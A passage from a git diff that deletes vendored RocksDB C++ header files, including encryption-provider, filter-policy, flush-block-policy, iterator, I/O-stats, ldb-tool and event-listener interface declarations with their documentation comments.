-      ROT13BlockCipher(size_t blockSize) 
-        : blockSize_(blockSize) {}
-      virtual ~ROT13BlockCipher() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() override { return blockSize_; }
-
-      // Encrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Encrypt(char *data) override;
-
-      // Decrypt a block of data.
-      // Length of data is equal to BlockSize().
-      virtual Status Decrypt(char *data) override;
-};
-
-// CTRCipherStream implements BlockAccessCipherStream using an 
-// Counter operations mode. 
-// See https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation
-//
-// Note: This is a possible implementation of BlockAccessCipherStream, 
-// it is considered suitable for use.
-class CTRCipherStream final : public BlockAccessCipherStream {
-    private:
-      BlockCipher& cipher_;
-      std::string iv_;
-      uint64_t initialCounter_;
-    public:
-      CTRCipherStream(BlockCipher& c, const char *iv, uint64_t initialCounter) 
-        : cipher_(c), iv_(iv, c.BlockSize()), initialCounter_(initialCounter) {};
-      virtual ~CTRCipherStream() {};
-
-      // BlockSize returns the size of each block supported by this cipher stream.
-      virtual size_t BlockSize() override { return cipher_.BlockSize(); }
-
-    protected:
-      // Allocate scratch space which is passed to EncryptBlock/DecryptBlock.
-      virtual void AllocateScratch(std::string&) override;
-
-      // Encrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status EncryptBlock(uint64_t blockIndex, char *data, char *scratch) override;
-
-      // Decrypt a block of data at the given block index.
-      // Length of data is equal to BlockSize();
-      virtual Status DecryptBlock(uint64_t blockIndex, char *data, char *scratch) override;
-};
-
-// The encryption provider is used to create a cipher stream for a specific file.
-// The returned cipher stream will be used for actual encryption/decryption 
-// actions.
-class EncryptionProvider {
- public:
-    virtual ~EncryptionProvider() {};
-
-    // GetPrefixLength returns the length of the prefix that is added to every file
-    // and used for storing encryption options.
-    // For optimal performance, the prefix length should be a multiple of 
-    // the a page size.
-    virtual size_t GetPrefixLength() = 0;
-
-    // CreateNewPrefix initialized an allocated block of prefix memory 
-    // for a new file.
-    virtual Status CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) = 0;
-
-    // CreateCipherStream creates a block access cipher stream for a file given
-    // given name and options.
-    virtual Status CreateCipherStream(const std::string& fname, const EnvOptions& options,
-      Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) = 0;
-};
-
-// This encryption provider uses a CTR cipher stream, with a given block cipher 
-// and IV.
-//
-// Note: This is a possible implementation of EncryptionProvider, 
-// it is considered suitable for use, provided a safe BlockCipher is used.
-class CTREncryptionProvider : public EncryptionProvider {
-    private:
-      BlockCipher& cipher_;
-    protected:
-      const static size_t defaultPrefixLength = 4096;
-
- public:
-      CTREncryptionProvider(BlockCipher& c) 
-        : cipher_(c) {};
-    virtual ~CTREncryptionProvider() {}
-
-    // GetPrefixLength returns the length of the prefix that is added to every file
-    // and used for storing encryption options.
-    // For optimal performance, the prefix length should be a multiple of 
-    // the a page size.
-    virtual size_t GetPrefixLength() override;
-
-    // CreateNewPrefix initialized an allocated block of prefix memory 
-    // for a new file.
-    virtual Status CreateNewPrefix(const std::string& fname, char *prefix, size_t prefixLength) override;
-
-    // CreateCipherStream creates a block access cipher stream for a file given
-    // given name and options.
-    virtual Status CreateCipherStream(const std::string& fname, const EnvOptions& options,
-      Slice& prefix, unique_ptr<BlockAccessCipherStream>* result) override;
-
-  protected:
-    // PopulateSecretPrefixPart initializes the data into a new prefix block 
-    // that will be encrypted. This function will store the data in plain text. 
-    // It will be encrypted later (before written to disk).
-    // Returns the amount of space (starting from the start of the prefix)
-    // that has been initialized.
-    virtual size_t PopulateSecretPrefixPart(char *prefix, size_t prefixLength, size_t blockSize);
-
-    // CreateCipherStreamFromPrefix creates a block access cipher stream for a file given
-    // given name and options. The given prefix is already decrypted.
-    virtual Status CreateCipherStreamFromPrefix(const std::string& fname, const EnvOptions& options,
-      uint64_t initialCounter, const Slice& iv, const Slice& prefix, unique_ptr<BlockAccessCipherStream>* result);
-};
-
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
diff --git a/thirdparty/rocksdb/include/rocksdb/experimental.h b/thirdparty/rocksdb/include/rocksdb/experimental.h
deleted file mode 100644
index 0592fe3..0000000
--- a/thirdparty/rocksdb/include/rocksdb/experimental.h
+++ /dev/null
@@ -1,29 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include "rocksdb/db.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-namespace experimental {
-
-// Supported only for Leveled compaction
-Status SuggestCompactRange(DB* db, ColumnFamilyHandle* column_family,
-                           const Slice* begin, const Slice* end);
-Status SuggestCompactRange(DB* db, const Slice* begin, const Slice* end);
-
-// Move all L0 files to target_level skipping compaction.
-// This operation succeeds only if the files in L0 have disjoint ranges; this
-// is guaranteed to happen, for instance, if keys are inserted in sorted
-// order. Furthermore, all levels between 1 and target_level must be empty.
-// If any of the above condition is violated, InvalidArgument will be
-// returned.
-Status PromoteL0(DB* db, ColumnFamilyHandle* column_family,
-                 int target_level = 1);
-
-}  // namespace experimental
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/filter_policy.h b/thirdparty/rocksdb/include/rocksdb/filter_policy.h
deleted file mode 100644
index 8add48e..0000000
--- a/thirdparty/rocksdb/include/rocksdb/filter_policy.h
+++ /dev/null
@@ -1,145 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// A database can be configured with a custom FilterPolicy object.
-// This object is responsible for creating a small filter from a set
-// of keys.  These filters are stored in rocksdb and are consulted
-// automatically by rocksdb to decide whether or not to read some
-// information from disk. In many cases, a filter can cut down the
-// number of disk seeks form a handful to a single disk seek per
-// DB::Get() call.
-//
-// Most people will want to use the builtin bloom filter support (see
-// NewBloomFilterPolicy() below).
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
-#define STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
-
-#include <memory>
-#include <stdexcept>
-#include <stdlib.h>
-#include <string>
-#include <vector>
-
-namespace rocksdb {
-
-class Slice;
-
-// A class that takes a bunch of keys, then generates filter
-class FilterBitsBuilder {
- public:
-  virtual ~FilterBitsBuilder() {}
-
-  // Add Key to filter, you could use any way to store the key.
-  // Such as: storing hashes or original keys
-  // Keys are in sorted order and duplicated keys are possible.
-  virtual void AddKey(const Slice& key) = 0;
-
-  // Generate the filter using the keys that are added
-  // The return value of this function would be the filter bits,
-  // The ownership of actual data is set to buf
-  virtual Slice Finish(std::unique_ptr<const char[]>* buf) = 0;
-
-  // Calculate num of entries fit into a space.
-  virtual int CalculateNumEntry(const uint32_t space) {
-#ifndef ROCKSDB_LITE
-    throw std::runtime_error("CalculateNumEntry not Implemented");
-#else
-    abort();
-#endif
-    return 0;
-  }
-};
-
-// A class that checks if a key can be in filter
-// It should be initialized by Slice generated by BitsBuilder
-class FilterBitsReader {
- public:
-  virtual ~FilterBitsReader() {}
-
-  // Check if the entry match the bits in filter
-  virtual bool MayMatch(const Slice& entry) = 0;
-};
-
-// We add a new format of filter block called full filter block
-// This new interface gives you more space of customization
-//
-// For the full filter block, you can plug in your version by implement
-// the FilterBitsBuilder and FilterBitsReader
-//
-// There are two sets of interface in FilterPolicy
-// Set 1: CreateFilter, KeyMayMatch: used for blockbased filter
-// Set 2: GetFilterBitsBuilder, GetFilterBitsReader, they are used for
-// full filter.
-// Set 1 MUST be implemented correctly, Set 2 is optional
-// RocksDB would first try using functions in Set 2. if they return nullptr,
-// it would use Set 1 instead.
-// You can choose filter type in NewBloomFilterPolicy
-class FilterPolicy {
- public:
-  virtual ~FilterPolicy();
-
-  // Return the name of this policy.  Note that if the filter encoding
-  // changes in an incompatible way, the name returned by this method
-  // must be changed.  Otherwise, old incompatible filters may be
-  // passed to methods of this type.
-  virtual const char* Name() const = 0;
-
-  // keys[0,n-1] contains a list of keys (potentially with duplicates)
-  // that are ordered according to the user supplied comparator.
-  // Append a filter that summarizes keys[0,n-1] to *dst.
-  //
-  // Warning: do not change the initial contents of *dst.  Instead,
-  // append the newly constructed filter to *dst.
-  virtual void CreateFilter(const Slice* keys, int n, std::string* dst)
-      const = 0;
-
-  // "filter" contains the data appended by a preceding call to
-  // CreateFilter() on this class.  This method must return true if
-  // the key was in the list of keys passed to CreateFilter().
-  // This method may return true or false if the key was not on the
-  // list, but it should aim to return false with a high probability.
-  virtual bool KeyMayMatch(const Slice& key, const Slice& filter) const = 0;
-
-  // Get the FilterBitsBuilder, which is ONLY used for full filter block
-  // It contains interface to take individual key, then generate filter
-  virtual FilterBitsBuilder* GetFilterBitsBuilder() const {
-    return nullptr;
-  }
-
-  // Get the FilterBitsReader, which is ONLY used for full filter block
-  // It contains interface to tell if key can be in filter
-  // The input slice should NOT be deleted by FilterPolicy
-  virtual FilterBitsReader* GetFilterBitsReader(const Slice& contents) const {
-    return nullptr;
-  }
-};
-
-// Return a new filter policy that uses a bloom filter with approximately
-// the specified number of bits per key.
-//
-// bits_per_key: bits per key in bloom filter. A good value for bits_per_key
-// is 10, which yields a filter with ~ 1% false positive rate.
-// use_block_based_builder: use block based filter rather than full filter.
-// If you want to builder full filter, it needs to be set to false.
-//
-// Callers must delete the result after any database that is using the
-// result has been closed.
-//
-// Note: if you are using a custom comparator that ignores some parts
-// of the keys being compared, you must not use NewBloomFilterPolicy()
-// and must provide your own FilterPolicy that also ignores the
-// corresponding parts of the keys.  For example, if the comparator
-// ignores trailing spaces, it would be incorrect to use a
-// FilterPolicy (like NewBloomFilterPolicy) that does not ignore
-// trailing spaces in keys.
-extern const FilterPolicy* NewBloomFilterPolicy(int bits_per_key,
-    bool use_block_based_builder = true);
-}
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_FILTER_POLICY_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h b/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h
deleted file mode 100644
index 5daa967..0000000
--- a/thirdparty/rocksdb/include/rocksdb/flush_block_policy.h
+++ /dev/null
@@ -1,62 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-class Slice;
-class BlockBuilder;
-struct Options;
-
-// FlushBlockPolicy provides a configurable way to determine when to flush a
-// block in the block based tables,
-class FlushBlockPolicy {
- public:
-  // Keep track of the key/value sequences and return the boolean value to
-  // determine if table builder should flush current data block.
-  virtual bool Update(const Slice& key,
-                      const Slice& value) = 0;
-
-  virtual ~FlushBlockPolicy() { }
-};
-
-class FlushBlockPolicyFactory {
- public:
-  // Return the name of the flush block policy.
-  virtual const char* Name() const = 0;
-
-  // Return a new block flush policy that flushes data blocks by data size.
-  // FlushBlockPolicy may need to access the metadata of the data block
-  // builder to determine when to flush the blocks.
-  //
-  // Callers must delete the result after any database that is using the
-  // result has been closed.
-  virtual FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const = 0;
-
-  virtual ~FlushBlockPolicyFactory() { }
-};
-
-class FlushBlockBySizePolicyFactory : public FlushBlockPolicyFactory {
- public:
-  FlushBlockBySizePolicyFactory() {}
-
-  const char* Name() const override { return "FlushBlockBySizePolicyFactory"; }
-
-  FlushBlockPolicy* NewFlushBlockPolicy(
-      const BlockBasedTableOptions& table_options,
-      const BlockBuilder& data_block_builder) const override;
-
-  static FlushBlockPolicy* NewFlushBlockPolicy(
-      const uint64_t size, const int deviation,
-      const BlockBuilder& data_block_builder);
-};
-
-}  // rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/iostats_context.h b/thirdparty/rocksdb/include/rocksdb/iostats_context.h
deleted file mode 100644
index 77a5964..0000000
--- a/thirdparty/rocksdb/include/rocksdb/iostats_context.h
+++ /dev/null
@@ -1,52 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <stdint.h>
-#include <string>
-
-#include "rocksdb/perf_level.h"
-
-// A thread local context for gathering io-stats efficiently and transparently.
-// Use SetPerfLevel(PerfLevel::kEnableTime) to enable time stats.
-
-namespace rocksdb {
-
-struct IOStatsContext {
-  // reset all io-stats counter to zero
-  void Reset();
-
-  std::string ToString(bool exclude_zero_counters = false) const;
-
-  // the thread pool id
-  uint64_t thread_pool_id;
-
-  // number of bytes that has been written.
-  uint64_t bytes_written;
-  // number of bytes that has been read.
-  uint64_t bytes_read;
-
-  // time spent in open() and fopen().
-  uint64_t open_nanos;
-  // time spent in fallocate().
-  uint64_t allocate_nanos;
-  // time spent in write() and pwrite().
-  uint64_t write_nanos;
-  // time spent in read() and pread()
-  uint64_t read_nanos;
-  // time spent in sync_file_range().
-  uint64_t range_sync_nanos;
-  // time spent in fsync
-  uint64_t fsync_nanos;
-  // time spent in preparing write (fallocate etc).
-  uint64_t prepare_write_nanos;
-  // time spent in Logger::Logv().
-  uint64_t logger_nanos;
-};
-
-// Get Thread-local IOStatsContext object pointer
-IOStatsContext* get_iostats_context();
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/iterator.h b/thirdparty/rocksdb/include/rocksdb/iterator.h
deleted file mode 100644
index d4ac528..0000000
--- a/thirdparty/rocksdb/include/rocksdb/iterator.h
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An iterator yields a sequence of key/value pairs from a source.
-// The following class defines the interface.  Multiple implementations
-// are provided by this library.  In particular, iterators are provided
-// to access the contents of a Table or a DB.
-//
-// Multiple threads can invoke const methods on an Iterator without
-// external synchronization, but if any of the threads may call a
-// non-const method, all threads accessing the same Iterator must use
-// external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
-#define STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
-
-#include <string>
-#include "rocksdb/cleanable.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class Iterator : public Cleanable {
- public:
-  Iterator() {}
-  virtual ~Iterator() {}
-
-  // An iterator is either positioned at a key/value pair, or
-  // not valid.  This method returns true iff the iterator is valid.
-  virtual bool Valid() const = 0;
-
-  // Position at the first key in the source.  The iterator is Valid()
-  // after this call iff the source is not empty.
-  virtual void SeekToFirst() = 0;
-
-  // Position at the last key in the source.  The iterator is
-  // Valid() after this call iff the source is not empty.
-  virtual void SeekToLast() = 0;
-
-  // Position at the first key in the source that at or past target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or past target.
-  virtual void Seek(const Slice& target) = 0;
-
-  // Position at the last key in the source that at or before target
-  // The iterator is Valid() after this call iff the source contains
-  // an entry that comes at or before target.
-  virtual void SeekForPrev(const Slice& target) {}
-
-  // Moves to the next entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the last entry in the source.
-  // REQUIRES: Valid()
-  virtual void Next() = 0;
-
-  // Moves to the previous entry in the source.  After this call, Valid() is
-  // true iff the iterator was not positioned at the first entry in source.
-  // REQUIRES: Valid()
-  virtual void Prev() = 0;
-
-  // Return the key for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: Valid()
-  virtual Slice key() const = 0;
-
-  // Return the value for the current entry.  The underlying storage for
-  // the returned slice is valid only until the next modification of
-  // the iterator.
-  // REQUIRES: !AtEnd() && !AtStart()
-  virtual Slice value() const = 0;
-
-  // If an error has occurred, return it.  Else return an ok status.
-  // If non-blocking IO is requested and this operation cannot be
-  // satisfied without doing some IO, then this returns Status::Incomplete().
-  virtual Status status() const = 0;
-
-  // If supported, renew the iterator to represent the latest state. The
-  // iterator will be invalidated after the call. Not supported if
-  // ReadOptions.snapshot is given when creating the iterator.
-  virtual Status Refresh() {
-    return Status::NotSupported("Refresh() is not supported");
-  }
-
-  // Property "rocksdb.iterator.is-key-pinned":
-  //   If returning "1", this means that the Slice returned by key() is valid
-  //   as long as the iterator is not deleted.
-  //   It is guaranteed to always return "1" if
-  //      - Iterator created with ReadOptions::pin_data = true
-  //      - DB tables were created with
-  //        BlockBasedTableOptions::use_delta_encoding = false.
-  // Property "rocksdb.iterator.super-version-number":
-  //   LSM version used by the iterator. The same format as DB Property
-  //   kCurrentSuperVersionNumber. See its comment for more information.
-  virtual Status GetProperty(std::string prop_name, std::string* prop);
-
- private:
-  // No copying allowed
-  Iterator(const Iterator&);
-  void operator=(const Iterator&);
-};
-
-// Return an empty iterator (yields nothing).
-extern Iterator* NewEmptyIterator();
-
-// Return an empty iterator with the specified status.
-extern Iterator* NewErrorIterator(const Status& status);
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_ITERATOR_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/ldb_tool.h b/thirdparty/rocksdb/include/rocksdb/ldb_tool.h
deleted file mode 100644
index 0ec2da9..0000000
--- a/thirdparty/rocksdb/include/rocksdb/ldb_tool.h
+++ /dev/null
@@ -1,43 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-#pragma once
-#include <string>
-#include <vector>
-#include "rocksdb/db.h"
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-// An interface for converting a slice to a readable string
-class SliceFormatter {
- public:
-  virtual ~SliceFormatter() {}
-  virtual std::string Format(const Slice& s) const = 0;
-};
-
-// Options for customizing ldb tool (beyond the DB Options)
-struct LDBOptions {
-  // Create LDBOptions with default values for all fields
-  LDBOptions();
-
-  // Key formatter that converts a slice to a readable string.
-  // Default: Slice::ToString()
-  std::shared_ptr<SliceFormatter> key_formatter;
-
-  std::string print_help_header = "ldb - RocksDB Tool";
-};
-
-class LDBTool {
- public:
-  void Run(
-      int argc, char** argv, Options db_options = Options(),
-      const LDBOptions& ldb_options = LDBOptions(),
-      const std::vector<ColumnFamilyDescriptor>* column_families = nullptr);
-};
-
-} // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/listener.h b/thirdparty/rocksdb/include/rocksdb/listener.h
deleted file mode 100644
index e132033..0000000
--- a/thirdparty/rocksdb/include/rocksdb/listener.h
+++ /dev/null
@@ -1,391 +0,0 @@
-// Copyright (c) 2014 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table_properties.h"
-
-namespace rocksdb {
-
-typedef std::unordered_map<std::string, std::shared_ptr<const TableProperties>>
-    TablePropertiesCollection;
-
-class DB;
-class ColumnFamilyHandle;
-class Status;
-struct CompactionJobStats;
-enum CompressionType : unsigned char;
-
-enum class TableFileCreationReason {
-  kFlush,
-  kCompaction,
-  kRecovery,
-};
-
-struct TableFileCreationBriefInfo {
-  // the name of the database where the file was created
-  std::string db_name;
-  // the name of the column family where the file was created.
-  std::string cf_name;
-  // the path to the created file.
-  std::string file_path;
-  // the id of the job (which could be flush or compaction) that
-  // created the file.
-  int job_id;
-  // reason of creating the table.
-  TableFileCreationReason reason;
-};
-
-struct TableFileCreationInfo : public TableFileCreationBriefInfo {
-  TableFileCreationInfo() = default;
-  explicit TableFileCreationInfo(TableProperties&& prop)
-      : table_properties(prop) {}
-  // the size of the file.
-  uint64_t file_size;
-  // Detailed properties of the created file.
-  TableProperties table_properties;
-  // The status indicating whether the creation was successful or not.
-  Status status;
-};
-
-enum class CompactionReason {
-  kUnknown,
-  // [Level] number of L0 files > level0_file_num_compaction_trigger
-  kLevelL0FilesNum,
-  // [Level] total size of level > MaxBytesForLevel()
-  kLevelMaxLevelSize,
-  // [Universal] Compacting for size amplification
-  kUniversalSizeAmplification,
-  // [Universal] Compacting for size ratio
-  kUniversalSizeRatio,
-  // [Universal] number of sorted runs > level0_file_num_compaction_trigger
-  kUniversalSortedRunNum,
-  // [FIFO] total size > max_table_files_size
-  kFIFOMaxSize,
-  // [FIFO] reduce number of files.
-  kFIFOReduceNumFiles,
-  // [FIFO] files with creation time < (current_time - interval)
-  kFIFOTtl,
-  // Manual compaction
-  kManualCompaction,
-  // DB::SuggestCompactRange() marked files for compaction
-  kFilesMarkedForCompaction,
-};
-
-enum class BackgroundErrorReason {
-  kFlush,
-  kCompaction,
-  kWriteCallback,
-  kMemTable,
-};
-
-#ifndef ROCKSDB_LITE
-
-struct TableFileDeletionInfo {
-  // The name of the database where the file was deleted.
-  std::string db_name;
-  // The path to the deleted file.
-  std::string file_path;
-  // The id of the job which deleted the file.
-  int job_id;
-  // The status indicating whether the deletion was successful or not.
-  Status status;
-};
-
-struct FlushJobInfo {
-  // the name of the column family
-  std::string cf_name;
-  // the path to the newly created file
-  std::string file_path;
-  // the id of the thread that completed this flush job.
-  uint64_t thread_id;
-  // the job id, which is unique in the same thread.
-  int job_id;
-  // If true, then rocksdb is currently slowing-down all writes to prevent
-  // creating too many Level 0 files as compaction seems not able to
-  // catch up the write request speed.  This indicates that there are
-  // too many files in Level 0.
-  bool triggered_writes_slowdown;
-  // If true, then rocksdb is currently blocking any writes to prevent
-  // creating more L0 files.  This indicates that there are too many
-  // files in level 0.  Compactions should try to compact L0 files down
-  // to lower levels as soon as possible.
-  bool triggered_writes_stop;
-  // The smallest sequence number in the newly created file
-  SequenceNumber smallest_seqno;
-  // The largest sequence number in the newly created file
-  SequenceNumber largest_seqno;
-  // Table properties of the table being flushed
-  TableProperties table_properties;
-};
-
-struct CompactionJobInfo {
-  CompactionJobInfo() = default;
-  explicit CompactionJobInfo(const CompactionJobStats& _stats) :
-      stats(_stats) {}
-
-  // the name of the column family where the compaction happened.
-  std::string cf_name;
-  // the status indicating whether the compaction was successful or not.
-  Status status;
-  // the id of the thread that completed this compaction job.
-  uint64_t thread_id;
-  // the job id, which is unique in the same thread.
-  int job_id;
-  // the smallest input level of the compaction.
-  int base_input_level;
-  // the output level of the compaction.
-  int output_level;
-  // the names of the compaction input files.
-  std::vector<std::string> input_files;
-
-  // the names of the compaction output files.
-  std::vector<std::string> output_files;
-  // Table properties for input and output tables.
-  // The map is keyed by values from input_files and output_files.
-  TablePropertiesCollection table_properties;
-
-  // Reason to run the compaction
-  CompactionReason compaction_reason;
-
-  // Compression algorithm used for output files
-  CompressionType compression;
-
-  // If non-null, this variable stores detailed information
-  // about this compaction.
-  CompactionJobStats stats;
-};
-
-struct MemTableInfo {
-  // the name of the column family to which memtable belongs
-  std::string cf_name;
-  // Sequence number of the first element that was inserted
-  // into the memtable.
-  SequenceNumber first_seqno;
-  // Sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into this
-  // memtable. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  SequenceNumber earliest_seqno;
-  // Total number of entries in memtable
-  uint64_t num_entries;
-  // Total number of deletes in memtable
-  uint64_t num_deletes;
-
-};
-
-struct ExternalFileIngestionInfo {
-  // the name of the column family
-  std::string cf_name;
-  // Path of the file outside the DB
-  std::string external_file_path;
-  // Path of the file inside the DB
-  std::string internal_file_path;
-  // The global sequence number assigned to keys in this file
-  SequenceNumber global_seqno;
-  // Table properties of the table being flushed
-  TableProperties table_properties;
-};
-
-// A call-back function to RocksDB which will be called when the compaction
-// iterator is compacting values. It is mean to be returned from
-// EventListner::GetCompactionEventListner() at the beginning of compaction
-// job.
-class CompactionEventListener {
- public:
-  enum CompactionListenerValueType {
-    kValue,
-    kMergeOperand,
-    kDelete,
-    kSingleDelete,
-    kRangeDelete,
-    kBlobIndex,
-    kInvalid,
-  };
-
-  virtual void OnCompaction(int level, const Slice& key,
-                            CompactionListenerValueType value_type,
-                            const Slice& existing_value,
-                            const SequenceNumber& sn, bool is_new) = 0;
-
-  virtual ~CompactionEventListener() = default;
-};
-
-// EventListener class contains a set of call-back functions that will
-// be called when specific RocksDB event happens such as flush.  It can
-// be used as a building block for developing custom features such as
-// stats-collector or external compaction algorithm.
-//
-// Note that call-back functions should not run for an extended period of
-// time before the function returns, otherwise RocksDB may be blocked.
-// For example, it is not suggested to do DB::CompactFiles() (as it may
-// run for a long while) or issue many of DB::Put() (as Put may be blocked
-// in certain cases) in the same thread in the EventListener callback.
-// However, doing DB::CompactFiles() and DB::Put() in another thread is
-// considered safe.
-//
-// [Threading] All EventListener callback will be called using the
-// actual thread that involves in that specific event.   For example, it
-// is the RocksDB background flush thread that does the actual flush to
-// call EventListener::OnFlushCompleted().
-//
-// [Locking] All EventListener callbacks are designed to be called without
-// the current thread holding any DB mutex. This is to prevent potential
-// deadlock and performance issue when using EventListener callback
-// in a complex way. However, all EventListener call-back functions
-// should not run for an extended period of time before the function
-// returns, otherwise RocksDB may be blocked. For example, it is not
-// suggested to do DB::CompactFiles() (as it may run for a long while)
-// or issue many of DB::Put() (as Put may be blocked in certain cases)
-// in the same thread in the EventListener callback. However, doing
-// DB::CompactFiles() and DB::Put() in a thread other than the
-// EventListener callback thread is considered safe.
-class EventListener {
- public:
-  // A call-back function to RocksDB which will be called whenever a
-  // registered RocksDB flushes a file.  The default implementation is
-  // no-op.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  virtual void OnFlushCompleted(DB* /*db*/,
-                                const FlushJobInfo& /*flush_job_info*/) {}
-
-  // A call-back function to RocksDB which will be called before a
-  // RocksDB starts to flush memtables.  The default implementation is
-  // no-op.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  virtual void OnFlushBegin(DB* /*db*/,
-                            const FlushJobInfo& /*flush_job_info*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a SST file is deleted.  Different from OnCompactionCompleted and
-  // OnFlushCompleted, this call-back is designed for external logging
-  // service and thus only provide string parameters instead
-  // of a pointer to DB.  Applications that build logic basic based
-  // on file creations and deletions is suggested to implement
-  // OnFlushCompleted and OnCompactionCompleted.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from the
-  // returned value.
-  virtual void OnTableFileDeleted(const TableFileDeletionInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a registered RocksDB compacts a file. The default implementation
-  // is a no-op.
-  //
-  // Note that this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns. Otherwise, RocksDB may be blocked.
-  //
-  // @param db a pointer to the rocksdb instance which just compacted
-  //   a file.
-  // @param ci a reference to a CompactionJobInfo struct. 'ci' is released
-  //  after this function is returned, and must be copied if it is needed
-  //  outside of this function.
-  virtual void OnCompactionCompleted(DB* /*db*/,
-                                     const CompactionJobInfo& /*ci*/) {}
-
-  // A call-back function for RocksDB which will be called whenever
-  // a SST file is created.  Different from OnCompactionCompleted and
-  // OnFlushCompleted, this call-back is designed for external logging
-  // service and thus only provide string parameters instead
-  // of a pointer to DB.  Applications that build logic basic based
-  // on file creations and deletions is suggested to implement
-  // OnFlushCompleted and OnCompactionCompleted.
-  //
-  // Historically it will only be called if the file is successfully created.
-  // Now it will also be called on failure case. User can check info.status
-  // to see if it succeeded or not.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnTableFileCreated(const TableFileCreationInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a SST file is being created. It will follow by OnTableFileCreated after
-  // the creation finishes.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnTableFileCreationStarted(
-      const TableFileCreationBriefInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a memtable is made immutable.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  //
-  // Note that if applications would like to use the passed reference
-  // outside this function call, they should make copies from these
-  // returned value.
-  virtual void OnMemTableSealed(
-    const MemTableInfo& /*info*/) {}
-
-  // A call-back function for RocksDB which will be called before
-  // a column family handle is deleted.
-  //
-  // Note that the this function must be implemented in a way such that
-  // it should not run for an extended period of time before the function
-  // returns.  Otherwise, RocksDB may be blocked.
-  // @param handle is a pointer to the column family handle to be deleted
